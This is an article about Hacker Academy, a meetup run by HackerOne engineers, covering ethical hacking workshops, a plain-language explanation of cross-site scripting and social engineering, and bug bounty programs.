Hacker Academy is a meetup for anyone interested in what white-hat hackers do, how to become one, and for developers who want to write more secure web applications. HackerOne software engineers Ivan Malykh and Philip Kocanda introduce people of all skill levels to the world of ethical hacking and point out the importance of internet security. During Google’s Digital X event last month, Hacker Academy was part of the side program, with a series of workshops. “We had our first meetup in May”, Ivan says. “Hacking is something you can learn on your own, but it’s much more fun in a group of likeminded people, and of course you can also get extra help.”
Last month’s workshops featured an interactive beginner session, where attendees learned about Cross-Site Scripting (XSS), a basic web-hacking technique. A few weeks ago, HackerOne published its 28-page 2017 Hacker-Powered Security report and Cross-Site Scripting (XSS) tops the list at 26 percent of reported vulnerability issues. Suffice to say, it’s a pretty big issue.
So what is it exactly? “Simply put, it’s injecting a string of code into a website”, Ivan explains. “We’ve all filled out web forms, where you can enter your name or other information. Instead of filling in your name, you can also fill in a piece of code and take over parts of the website. A hacker would then be able to see sensitive user information like passwords or account information, and sometimes even turn on the camera. If you don’t regularly update your web browser, you’re very vulnerable to those attacks.”
Hacking is all about finding vulnerabilities. But it’s not just about the software or the system, it’s also the people using it. “We call that social engineering, which is a lot like phishing”, Ivan explains. “We tend to leave security up to the IT people, so the rest of the employees can concentrate on their own work. But when employees are not aware of those dangers or not adequately trained, that’s a major risk, because it only takes one employee to fall for it.”
Social engineering can be as simple as sending a phishing mail and hoping someone will take the bait, but it can also be more elaborate. A hacker could for example casually walk into an office building and post a memo on the bulletin board, saying the phone number of the IT helpdesk has changed. “Employees have no reason not to trust a simple memo on a bulletin board”, Ivan says.
So what’s to stop people from using the skills they learn at the Hacker Academy meetups? “We highly encourage that, because that’s exactly what our HackerOne platform is for!” Ivan says with a smile. “If you want to make money as a hacker, you can, because it’s perfectly legal through our platform and you don’t have to worry about the consequences of getting caught.”
“I think a lot of people have the wrong idea about what hacking really is”, Ivan continues. “And that’s one of the reasons we’re organizing these meetups. By learning to hack, you also learn just how easy it is to be hacked, There’s nothing wrong with learning about security and hacking itself is also a lot of fun.”
A lot of big companies like Twitter, Dropbox and General Motors use the HackerOne platform, and even the US Department of Defense offers bounties for finding security leaks. “But not a lot of Dutch and European companies use it though”, Ivan says. “I guess it’s still somewhat of a taboo here to use or pay hackers. I’m hoping that’ll change soon though, because a lot of companies don’t realize just how vulnerable they are.”
The next meetup will be somewhere in late August or early September. In the meantime, if you want to learn a little bit more about hacking, HackerOne is very open about fixed leaks and publishes it on their Hacktivity page.